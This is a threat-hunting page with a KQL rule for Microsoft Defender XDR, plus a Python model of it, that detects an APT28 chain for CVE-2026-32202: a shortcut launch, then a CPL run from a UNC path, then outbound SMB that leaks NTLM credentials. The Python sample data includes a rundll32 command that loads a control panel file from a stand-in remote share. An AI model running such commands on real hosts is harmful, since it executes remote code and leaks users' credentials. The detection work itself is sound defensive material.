# *APT28 Kill Chain for CVE-2026-32202*
## Query Information
#### MITRE ATT&CK Technique(s)
| Technique ID | Title | Link |
| --- | --- | --- |
| T1566.001 | Phishing: Spearphishing Attachment | https://attack.mitre.org/techniques/T1566/001/ |
| T1187 | Forced Authentication | https://attack.mitre.org/techniques/T1187/ |
| T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | https://attack.mitre.org/techniques/T1557/001/ |
#### Description
This rule detects a multi-stage attack chain attributed to APT28, starting with initial access via a malicious LNK file, followed by execution of a CPL/DLL/EXE from a UNC path, and culminating in NTLM credential exfiltration over SMB to a non-private IP address. This chain is associated with exploitation of CVE-2026-32202.
#### Author
- **Name: Benjamin Zulliger**
- **Github: https://github.com/benscha/KQLAdvancedHunting**
- **LinkedIn: https://www.linkedin.com/in/benjamin-zulliger/**
#### References
- https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
## Defender XDR
```KQL
// APT28 Kill Chain for CVE-2026-32202
// https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
// LNK → CPL/UNC → SMB → NTLM Exfil
let timeframe = 7d;
// Stage 1: a process whose parent command line references a shortcut (.lnk) file
let InitialAccess_LNK = DeviceProcessEvents
| where TimeGenerated > ago(timeframe)
| where InitiatingProcessCommandLine has ".lnk"
| project DeviceId, LNK_TriggerTime = TimeGenerated, LNK_CommandLine = InitiatingProcessCommandLine;
// Stage 2: a CPL/DLL/EXE referenced through a UNC path (\\host\share\...) on the command line
let Execution_UNC = DeviceProcessEvents
| where TimeGenerated > ago(timeframe)
| where ProcessCommandLine matches regex @"\\\\[a-zA-Z0-9\-\.]{4,}\\"
| where ProcessCommandLine has_any (".cpl", ".dll", ".exe")
| project DeviceId, UNC_LoadTime = TimeGenerated, UNC_CommandLine = ProcessCommandLine;
// Stage 3: outbound SMB to a non-RFC 1918 IPv4 address, where the NTLM handshake leaks
// Note: ipv4_is_private() returns null for IPv6 values, so those rows are dropped here
let Exfiltration_SMB = DeviceNetworkEvents
| where TimeGenerated > ago(timeframe)
| where RemotePort == 445
| where not(ipv4_is_private(RemoteIP))
| project DeviceId, SMB_ConnectTime = TimeGenerated, RemoteIP;
// Correlate the stages on the same device; each stage must follow the previous one within 2 minutes
InitialAccess_LNK
| join kind=inner Execution_UNC on DeviceId
| where UNC_LoadTime between (LNK_TriggerTime .. (LNK_TriggerTime + 2m))
| join kind=inner Exfiltration_SMB on DeviceId
| where SMB_ConnectTime between (UNC_LoadTime .. (UNC_LoadTime + 2m))
| project
    DeviceId,
    LNK_Time = LNK_TriggerTime,
    UNC_Time = UNC_LoadTime,
    SMB_Time = SMB_ConnectTime,
    LNK_CommandLine,
    UNC_CommandLine,
    RemoteIP
| extend
    AlertTitle = "APT28 Kill Chain: LNK→UNC→SMB (CVE-2026-32202)",
    Severity = "Critical",
    MITRE = "T1566.001 → T1187 → T1557.001"
```
This query is designed to detect a specific attack pattern attributed to the APT28 group and associated with exploitation of CVE-2026-32202. Here is a breakdown of what the query does:
- **Timeframe:** The query looks at events from the past 7 days (`timeframe = 7d`).
- **Initial Access Detection:** It searches `DeviceProcessEvents` for processes whose parent command line references a shortcut file (`.lnk`). This is the first step in the chain, where the user opens the malicious shortcut delivered by spearphishing.
- **Execution Detection:** It then looks for processes whose command line contains a UNC path (`\\host\...`) together with a `.cpl`, `.dll`, or `.exe` file, indicating that the payload is being loaded from a network share rather than from local disk.
- **Exfiltration Detection:** Finally, it looks in `DeviceNetworkEvents` for outbound SMB connections (port 445) to non-private IPv4 addresses. When a Windows host connects to an attacker-controlled SMB server, the SMB client authenticates automatically and hands the user's NTLM credential material (the Net-NTLM response) to that server; the outbound connection is the observable the query keys on.
- **Correlation:** The three stages are joined on `DeviceId` and must occur in order: the UNC execution within 2 minutes of the LNK trigger, and the SMB connection within 2 minutes of the UNC execution. KQL's `between` is inclusive at both ends, so a single event that satisfies two stages at the same timestamp still correlates.
- **Output:** If the pattern is found, the query emits one row per matching chain with the times of each event, the command lines used, and the external IP address involved. The row is labeled "Critical" and mapped to T1566.001 (spearphishing attachment), T1187 (forced authentication), and T1557.001 (adversary-in-the-middle).
Things to keep in mind before turning the query into an alert:
- The only join key is `DeviceId`, so on a busy host any `.lnk` launch inside the window can pair with unrelated UNC executions and SMB connections. If the query yields too many candidate chains, join on process ancestry as well or tighten the windows.
- `ipv4_is_private()` returns null for values that are not IPv4 addresses, so SMB connections to IPv6 destinations are silently dropped from the exfiltration stage rather than matched.
- `ipv4_is_private()` covers only the RFC 1918 ranges; exclude your own public address space and any sanctioned external file servers before alerting.
- In the Microsoft Defender XDR advanced hunting portal the device tables expose the event time as `Timestamp`; `TimeGenerated` is the column name when the same tables are queried through Microsoft Sentinel.
Overall, this query helps identify a multi-stage attack involving phishing, payload execution from a network path, and NTLM credential theft, all linked to a known vulnerability.
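To show how the three-stage correlation behaves on concrete events, here is an added Python model of the query's logic, written for this page and not part of the original query or the KQLAdvancedHunting project, run over a handful of constructed telemetry rows. Column names follow the query; `has_term` is a substring approximation of KQL's term-based `has`, the private-range check mirrors `ipv4_is_private()` on the RFC 1918 ranges, and the device names, timestamps and addresses are invented for the sample.

```python
import re
import ipaddress
from datetime import datetime, timedelta

# Regex and window taken from the KQL query on this page
UNC_RE = re.compile(r"\\\\[a-zA-Z0-9\-\.]{4,}\\")
WINDOW = timedelta(minutes=2)
# KQL's ipv4_is_private() treats exactly the RFC 1918 ranges as private
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def has_term(text, term):
    """Substring approximation of KQL's term-based, case-insensitive `has`."""
    return term.lower() in text.lower()


def is_external_ipv4(ip):
    """Mirror `not(ipv4_is_private(RemoteIP))`: a non-IPv4 string evaluates to
    null in KQL and drops out of the result, so it is treated as False here."""
    try:
        addr = ipaddress.IPv4Address(ip)
    except ipaddress.AddressValueError:
        return False
    return not any(addr in net for net in RFC1918)


def initial_access_lnk(process_events):
    """Stage 1: parent command line references a .lnk file."""
    return [(e["DeviceId"], e["TimeGenerated"], e["InitiatingProcessCommandLine"])
            for e in process_events if has_term(e["InitiatingProcessCommandLine"], ".lnk")]


def execution_unc(process_events):
    """Stage 2: UNC path plus a .cpl/.dll/.exe reference on the command line."""
    return [(e["DeviceId"], e["TimeGenerated"], e["ProcessCommandLine"])
            for e in process_events
            if UNC_RE.search(e["ProcessCommandLine"])
            and any(has_term(e["ProcessCommandLine"], ext) for ext in (".cpl", ".dll", ".exe"))]


def exfiltration_smb(network_events):
    """Stage 3: outbound SMB (445) to a non-private IPv4 address."""
    return [(e["DeviceId"], e["TimeGenerated"], e["RemoteIP"])
            for e in network_events
            if e["RemotePort"] == 445 and is_external_ipv4(e["RemoteIP"])]


def within(t, start, window=WINDOW):
    """KQL `between (start .. start + window)` is inclusive at both ends."""
    return start <= t <= start + window


def correlate(process_events, network_events):
    """Inner-join the three stages on DeviceId with the query's sequential 2-minute windows."""
    hits = []
    for dev, lnk_t, lnk_cmd in initial_access_lnk(process_events):
        for dev2, unc_t, unc_cmd in execution_unc(process_events):
            if dev2 != dev or not within(unc_t, lnk_t):
                continue
            for dev3, smb_t, remote_ip in exfiltration_smb(network_events):
                if dev3 == dev and within(smb_t, unc_t):
                    hits.append({"DeviceId": dev, "LNK_Time": lnk_t, "UNC_Time": unc_t,
                                 "SMB_Time": smb_t, "LNK_CommandLine": lnk_cmd,
                                 "UNC_CommandLine": unc_cmd, "RemoteIP": remote_ip})
    return hits


# Constructed sample telemetry (not real logs); only the columns the query reads are present.
T0 = datetime(2026, 4, 20, 9, 0, 0)
LNK_PARENT = r'"C:\Windows\explorer.exe" "C:\Users\u\Downloads\Invoice_Q1.lnk"'
UNC_CPL = r"rundll32.exe shell32.dll,Control_RunDLL \\files.example.net\share\update.cpl"


def proc(dev, offset_s, parent_cmd, cmd):
    return {"DeviceId": dev, "TimeGenerated": T0 + timedelta(seconds=offset_s),
            "InitiatingProcessCommandLine": parent_cmd, "ProcessCommandLine": cmd}


def net(dev, offset_s, remote_ip, port=445):
    return {"DeviceId": dev, "TimeGenerated": T0 + timedelta(seconds=offset_s),
            "RemoteIP": remote_ip, "RemotePort": port}


SAMPLE_PROCESS_EVENTS = [
    proc("dev-A", 0, LNK_PARENT, "cmd.exe /c control.exe"),   # stage 1
    proc("dev-A", 30, "cmd.exe /c control.exe", UNC_CPL),      # stage 2, +30 s
    proc("dev-B", 0, LNK_PARENT, "cmd.exe /c control.exe"),   # stage 1
    proc("dev-B", 600, "cmd.exe /c control.exe", UNC_CPL),     # stage 2, but +10 min: outside the window
    proc("dev-C", 0, LNK_PARENT, "cmd.exe /c control.exe"),   # stage 1
    proc("dev-C", 20, "cmd.exe /c control.exe", UNC_CPL),      # stage 2, +20 s
]
SAMPLE_NETWORK_EVENTS = [
    net("dev-A", 40, "10.0.0.5"),        # internal file server: excluded by ipv4_is_private
    net("dev-A", 45, "203.0.113.10"),    # external SMB listener: completes the chain
    net("dev-B", 610, "203.0.113.10"),   # external, but stage 2 already missed its window
    net("dev-C", 30, "2001:db8::1"),     # IPv6: null from ipv4_is_private, so dropped
]


def detect_sample():
    return correlate(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS)


if __name__ == "__main__":
    for hit in detect_sample():
        print(hit)
```

Only `dev-A` produces a chain: `dev-B` fails the first window, and `dev-C`'s SMB connection goes to an IPv6 address that the private-range check discards, which is the same silent drop the KQL exhibits. Swapping the sample rows for real exported telemetry is a quick way to sanity-check window sizes before running the query at scale.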

Benjamin Zulliger
Released: April 28, 2026